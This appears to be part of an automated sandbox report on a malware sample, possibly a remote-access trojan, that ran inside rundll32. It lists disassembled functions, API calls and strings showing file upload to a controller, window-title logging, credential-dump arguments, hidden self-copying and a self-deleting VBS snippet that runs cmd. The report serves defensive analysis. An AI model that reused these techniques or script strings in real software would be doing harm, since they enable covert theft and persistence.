                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02B01B85
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02B01B96
                                      • WriteFile.KERNEL32(00000000,02B72AB6,00000002,00000000,00000000), ref: 02B01BA7
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02B01BB7
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02B01BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: 99593135c6bec7fff23039ab430673daa460f0f9c60a9a91c932ce7a4db9e05f
                                      • Instruction ID: 26f0b0e83e76f24e3640f15e4f28523a38d16d17672b9b524f6067e44663536f
                                      • Opcode Fuzzy Hash: 99593135c6bec7fff23039ab430673daa460f0f9c60a9a91c932ce7a4db9e05f
                                      • Instruction Fuzzy Hash: 55412C72654318BAF210DA51DD86FBB7FECEB85B50F40081AFA54D6080D7A4A909DBB3
                                      Function 02B07270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\rundll32.exe,00000001,02B0764D,C:\Windows\SysWOW64\rundll32.exe,00000003,02B07675,02B752D8,02B076CE), ref: 02B07284
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B0728D
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02B072A2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072A5
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02B072B6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072B9
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02B072CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072CD
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02B072DE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072E1
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02B072F2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                      • API String ID: 1646373207-365949992
                                      • Opcode ID: 3e35de10f8d7563c1ad4b9019c9181a443cd48885ccced92d7b772a078b3e2bc
                                      • Instruction ID: a578e7823430af6f4babba4f678f9aa9fdc24af34981415f3da277d79a58f659
                                      • Opcode Fuzzy Hash: 3e35de10f8d7563c1ad4b9019c9181a443cd48885ccced92d7b772a078b3e2bc
                                      • Instruction Fuzzy Hash: 7A0171E1E8031A76BB226B3A5C98D1BEF9CDF551913091CA7B806E3151EFBCD450DEA0
                                      Function 02B0CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 02B0CE07
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,02B750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 02B0CE20
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\rundll32.exe,00000000,00000000,00000000,00000000,00000000,?,02B750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 02B0CED0
                                      • _wcslen.LIBCMT ref: 02B0CEE6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 02B0CF6E
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\rundll32.exe,00000000,00000000), ref: 02B0CF84
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02B0CFC3
                                      • _wcslen.LIBCMT ref: 02B0CFC6
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02B0CFDD
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B750E4,0000000E), ref: 02B0D02D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000001), ref: 02B0D04B
                                      • ExitProcess.KERNEL32 ref: 02B0D062
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                      • String ID: 6$C:\Windows\SysWOW64\rundll32.exe$del$open
                                      • API String ID: 1579085052-896526524
                                      • Opcode ID: 32d722a5dd5d05108fd1af5909d1fec1199bd1ce20d6e38bbb9966f20d7bf445
                                      • Instruction ID: 4040ac9beb50085a80f1ba317ff2777caca7dcb903948fbad4b1696101775014
                                      • Opcode Fuzzy Hash: 32d722a5dd5d05108fd1af5909d1fec1199bd1ce20d6e38bbb9966f20d7bf445
                                      • Instruction Fuzzy Hash: 9651CF21658300ABE61BB76898E0F7F7F9FAB94714F4004DDF64A872D1EF54D8098B62
                                      Function 02B1C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?), ref: 02B1C036
                                      • _memcmp.LIBVCRUNTIME ref: 02B1C04E
                                      • lstrlenW.KERNEL32(?), ref: 02B1C067
                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02B1C0A2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02B1C0B5
                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02B1C0F9
                                      • lstrcmpW.KERNEL32(?,?), ref: 02B1C114
                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02B1C12C
                                      • _wcslen.LIBCMT ref: 02B1C13B
                                      • FindVolumeClose.KERNEL32(?), ref: 02B1C15B
                                      • GetLastError.KERNEL32 ref: 02B1C173
                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02B1C1A0
                                      • lstrcatW.KERNEL32(?,?), ref: 02B1C1B9
                                      • lstrcpyW.KERNEL32(?,?), ref: 02B1C1C8
                                      • GetLastError.KERNEL32 ref: 02B1C1D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                      • String ID: ?
                                      • API String ID: 3941738427-1684325040
                                      • Opcode ID: 861c02aaa2b963255762c9d712dc90a74897bb4c75356d08e3c950415b480477
                                      • Instruction ID: 47e48fba693f075faa6741e6e7a8d755c611215bfb024bebe3ac3b0705690c4d
                                      • Opcode Fuzzy Hash: 861c02aaa2b963255762c9d712dc90a74897bb4c75356d08e3c950415b480477
                                      • Instruction Fuzzy Hash: E841BF71984315ABDB20DF60D84CAAB7BECEB55354F40096BF581C3160EB74C998CBD2
                                      Function 02B4F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: c1f4608acb4ce66888f010102b5c32ff9ad463a0266bc5932d0d8383a326026b
                                      • Instruction ID: c5f396036808f9aac3d15f76ae79fb7f9c74d4218b9202223b02b41f1549a015
                                      • Opcode Fuzzy Hash: c1f4608acb4ce66888f010102b5c32ff9ad463a0266bc5932d0d8383a326026b
                                      • Instruction Fuzzy Hash: 83D1F672D00300AFDB25AF7898C0B7977A9EF01354F5845EEEE55A7681EF359A00EB90
                                      Function 02B14D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02B14DD5
                                      • LoadLibraryA.KERNEL32(?), ref: 02B14E17
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E37
                                      • FreeLibrary.KERNEL32(00000000), ref: 02B14E3E
                                      • LoadLibraryA.KERNEL32(?), ref: 02B14E76
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E88
                                      • FreeLibrary.KERNEL32(00000000), ref: 02B14E8F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02B14E9E
                                      • FreeLibrary.KERNEL32(00000000), ref: 02B14EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-744132762
                                      • Opcode ID: 98c566ae60f3c4b40f900e32a84e1290b8d6eb37e8bda9ceabd3f391b17055fb
                                      • Instruction ID: 96df67a855abefaa1d28b153a4a099083f6f43fd91e73dbd4283c555fc02206c
                                      • Opcode Fuzzy Hash: 98c566ae60f3c4b40f900e32a84e1290b8d6eb37e8bda9ceabd3f391b17055fb
                                      • Instruction Fuzzy Hash: A431E7B3901715ABD320DF64D888E9BBBECEF44784F800A99F99897200D735D9458BE6
                                      Function 02B1D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 02B1D5DA
                                      • GetCursorPos.USER32(?), ref: 02B1D5E9
                                      • SetForegroundWindow.USER32(?), ref: 02B1D5F2
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02B1D60C
                                      • Shell_NotifyIconA.SHELL32(00000002,02B74B48), ref: 02B1D65D
                                      • ExitProcess.KERNEL32 ref: 02B1D665
                                      • CreatePopupMenu.USER32 ref: 02B1D66B
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02B1D680
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: ec397864fe17d755a4e9ce81266b30d7a37d1ae8cac5258696f8b87050bcbdb4
                                      • Instruction ID: fe81beb9c95a7b980a3be75ab2b421ea7b18bdcbde6a2ccfb47c3052d0771be0
                                      • Opcode Fuzzy Hash: ec397864fe17d755a4e9ce81266b30d7a37d1ae8cac5258696f8b87050bcbdb4
                                      • Instruction Fuzzy Hash: 2A214A7598020AEFEB154FA4ED0EB693F75FB08386F444954F6069A0A0D7719D30DB90
                                      Function 02B45D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 2dc59439f677e320e0e5d65b82b51f895fc31a61d0e7625455878024929f6247
                                      • Instruction ID: 2aeccd9456827a4450416f9c29a8f5f9d433bf6c558e95fcdcd38485c8445c4a
                                      • Opcode Fuzzy Hash: 2dc59439f677e320e0e5d65b82b51f895fc31a61d0e7625455878024929f6247
                                      • Instruction Fuzzy Hash: C8B1BF719003059FDB21DF68C8C0BEEBBF9FF09304F5442A9E9A4A7241DB75A945EB60
                                      Function 02B512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 02B5130A
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B5051F
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50531
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50543
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50555
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50567
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50579
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B5058B
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B5059D
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505AF
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505C1
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505D3
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505E5
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505F7
                                      • _free.LIBCMT ref: 02B512FF
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B51321
                                      • _free.LIBCMT ref: 02B51336
                                      • _free.LIBCMT ref: 02B51341
                                      • _free.LIBCMT ref: 02B51363
                                      • _free.LIBCMT ref: 02B51376
                                      • _free.LIBCMT ref: 02B51384
                                      • _free.LIBCMT ref: 02B5138F
                                      • _free.LIBCMT ref: 02B513C7
                                      • _free.LIBCMT ref: 02B513CE
                                      • _free.LIBCMT ref: 02B513EB
                                      • _free.LIBCMT ref: 02B51403
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: ec651799f003a733bf98678b91b1ff7a6fef13f9e924d302137bad5bfbca5a71
                                      • Instruction ID: 9f32437effd29a249c8c0b68561d2c46fc0af4ca2dc571102c78f484f100bf5b
                                      • Opcode Fuzzy Hash: ec651799f003a733bf98678b91b1ff7a6fef13f9e924d302137bad5bfbca5a71
                                      • Instruction Fuzzy Hash: 30317831610310AFEF22AE3DD884F5AB7EAEF01315F50C599E968DB550DF70AD809B60
                                      Function 02B08B7A Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02B08CE3
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 02B08D1B
                                      • __aulldiv.LIBCMT ref: 02B08D4D
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02B08E70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02B08E8B
                                      • CloseHandle.KERNEL32(00000000), ref: 02B08F64
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 02B08FAE
                                      • CloseHandle.KERNEL32(00000000), ref: 02B08FFC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                      • API String ID: 3086580692-2596673759
                                      • Opcode ID: b26683f9b7040072ad313d060fda0e0f58748e705e4cbc40715877a4a8616463
                                      • Instruction ID: ddb824623d1a243ae130e49918c3c42e0a33a7b5c1555c667ee131d95a15cea4
                                      • Opcode Fuzzy Hash: b26683f9b7040072ad313d060fda0e0f58748e705e4cbc40715877a4a8616463
                                      • Instruction Fuzzy Hash: 62B17E316083409BD32AEB24C8D4A6FBBE6EF84350F40499DF48A472D0EF759949CF56
                                      Function 02B1C6F3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32 ref: 02B1C6F5
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02B1C726
                                      • RegCloseKey.ADVAPI32(?), ref: 02B1C9BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                      • API String ID: 1332880857-3730529168
                                      • Opcode ID: a4e92f971750bea03cc18141fde472709d1e0681e5d3867997a8d22ed3d43a50
                                      • Instruction ID: 18d25046cefc8ac0704215ee737f99ad6ce629056900fae71764672319b8bbc7
                                      • Opcode Fuzzy Hash: a4e92f971750bea03cc18141fde472709d1e0681e5d3867997a8d22ed3d43a50
                                      • Instruction Fuzzy Hash: B06106711183459BD32AEB14D894EEFB7E9BF94304F5049AEE589831A0FF309949CF52
                                      Function 02B50600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: a7ff0a224e2c709403702587dffebaea54594644fd6f7b881c11f6071bc6464f
                                      • Instruction ID: 33fdaf85e3e7c3b02a0ca8943869e56243e748b1b8761dd95f5809763a557a89
                                      • Opcode Fuzzy Hash: a7ff0a224e2c709403702587dffebaea54594644fd6f7b881c11f6071bc6464f
                                      • Instruction Fuzzy Hash: B8C14372E41214AFDB20DBA8CC82FEE77F9AB09700F544595FE05EF281D6B09D419BA4
                                      Function 02B12AB4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02B12ACD
                                        • Part of subcall function 02B1B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,02B66468,02B0D20D,.vbs,?,?,?,?,?,02B752F0), ref: 02B1B99F
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B040F5,?,?,02B040F5,02B65E74), ref: 02B1857E
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B65E74,?,?,02B040F5,02B65E74), ref: 02B18587
                                      • Sleep.KERNEL32(0000000A,02B65E74), ref: 02B12C1F
                                      • Sleep.KERNEL32(0000000A,02B65E74,02B65E74), ref: 02B12CC1
                                      • Sleep.KERNEL32(0000000A,02B65E74,02B65E74,02B65E74), ref: 02B12D63
                                      • DeleteFileW.KERNEL32(00000000,02B65E74,02B65E74,02B65E74), ref: 02B12DC5
                                      • DeleteFileW.KERNEL32(00000000,02B65E74,02B65E74,02B65E74), ref: 02B12DFC
                                      • DeleteFileW.KERNEL32(00000000,02B65E74,02B65E74,02B65E74), ref: 02B12E38
                                      • Sleep.KERNEL32(000001F4,02B65E74,02B65E74,02B65E74), ref: 02B12E52
                                      • Sleep.KERNEL32(00000064), ref: 02B12E94
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "
                                      • API String ID: 1223786279-3856184850
                                      • Opcode ID: ce77af032d9e8ebf8983a20fc58c7e7fc8943d783b57a3c9f85fdfc310e988e5
                                      • Instruction ID: 4ece7d05c577823dec80aa98982ec173a94d6839537c71e8d2213bd497aacc5b
                                      • Opcode Fuzzy Hash: ce77af032d9e8ebf8983a20fc58c7e7fc8943d783b57a3c9f85fdfc310e988e5
                                      • Instruction Fuzzy Hash: 7E0244315183808AD32AFB64D8D4AEFBBE6AF94344F90489DE58A471D0EF70994DCF52
                                      Function 02B55BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B558A9: CreateFileW.KERNEL32(00000000,00000000,?,02B55C84,?,?,00000000,?,02B55C84,00000000,0000000C), ref: 02B558C6
                                      • GetLastError.KERNEL32 ref: 02B55CEF
                                      • __dosmaperr.LIBCMT ref: 02B55CF6
                                      • GetFileType.KERNEL32(00000000), ref: 02B55D02
                                      • GetLastError.KERNEL32 ref: 02B55D0C
                                      • __dosmaperr.LIBCMT ref: 02B55D15
                                      • CloseHandle.KERNEL32(00000000), ref: 02B55D35
                                      • CloseHandle.KERNEL32(?), ref: 02B55E7F
                                      • GetLastError.KERNEL32 ref: 02B55EB1
                                      • __dosmaperr.LIBCMT ref: 02B55EB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: ebb517bff8066d1a848a2e7da4f2747c025c5c515fdee73ee687c5617c81bc52
                                      • Instruction ID: 97e68335363825698eedb9c8b997f39299c6f90f1d6012448e6d015564ad5669
                                      • Opcode Fuzzy Hash: ebb517bff8066d1a848a2e7da4f2747c025c5c515fdee73ee687c5617c81bc52
                                      • Instruction Fuzzy Hash: 8BA13432A142689FDF29AF68DC91BAE7BA1EF06325F14018DEC11DF2D1DB359812CB51
                                      Function 02B14BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: 15d06727fb7da973d20bc46b37ec3d15b8aab4a0cc4cfb0badf64f6ccc136be1
                                      • Instruction ID: cc8fb70d5ce1bb8917eaa81e18ecdf8e7be0d5e58802ad7b512110e3a6210baf
                                      • Opcode Fuzzy Hash: 15d06727fb7da973d20bc46b37ec3d15b8aab4a0cc4cfb0badf64f6ccc136be1
                                      • Instruction Fuzzy Hash: 3A5117756057019FDB209F68C908B3B37F4EF84B59F8808ADF89597290DB69CC40CB62
                                      Function 02B0ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02B0AD38
                                      • Sleep.KERNEL32(000001F4), ref: 02B0AD43
                                      • GetForegroundWindow.USER32 ref: 02B0AD49
                                      • GetWindowTextLengthW.USER32(00000000), ref: 02B0AD52
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 02B0AD86
                                      • Sleep.KERNEL32(000003E8), ref: 02B0AE54
                                        • Part of subcall function 02B0A636: SetEvent.KERNEL32(?,?,00000000,02B0B20A,00000000), ref: 02B0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: eef050ec4b2025e5f6444e4beea93b442d903857c28a11b8e58ecbdb16f66e1d
                                      • Instruction ID: 7e120fe2490f844810144733bae6d362f4341002d8846d6ee59312b764c9efaf
                                      • Opcode Fuzzy Hash: eef050ec4b2025e5f6444e4beea93b442d903857c28a11b8e58ecbdb16f66e1d
                                      • Instruction Fuzzy Hash: A851D4326043409BD316F734D8C4ABF7FABAB84304F5009E9F596871E0EF249945CE92
                                      Function 02B0D7FF Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B12850: TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                        • Part of subcall function 02B12850: WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                        • Part of subcall function 02B136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,02B752F0), ref: 02B13714
                                        • Part of subcall function 02B136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02B1372D
                                        • Part of subcall function 02B136F8: RegCloseKey.KERNEL32(00000000), ref: 02B13738
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02B0D859
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000000), ref: 02B0D9B8
                                      • ExitProcess.KERNEL32 ref: 02B0D9C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                      • API String ID: 1913171305-2411266221
                                      • Opcode ID: b518e28b149545766c49d99683d99cbc7361d4efd2eeddd61e4ae941f44ddee4
                                      • Instruction ID: 7d56a1452e1f0132c5d5f191552b4b32515a82c28356c41b2835fd35ccae3123
                                      • Opcode Fuzzy Hash: b518e28b149545766c49d99683d99cbc7361d4efd2eeddd61e4ae941f44ddee4
                                      • Instruction Fuzzy Hash: 32413D319101185ADB1AF7A4DCD4DFEBB7EAF50700F4041E9A50AA70E5FF649E8ACE90
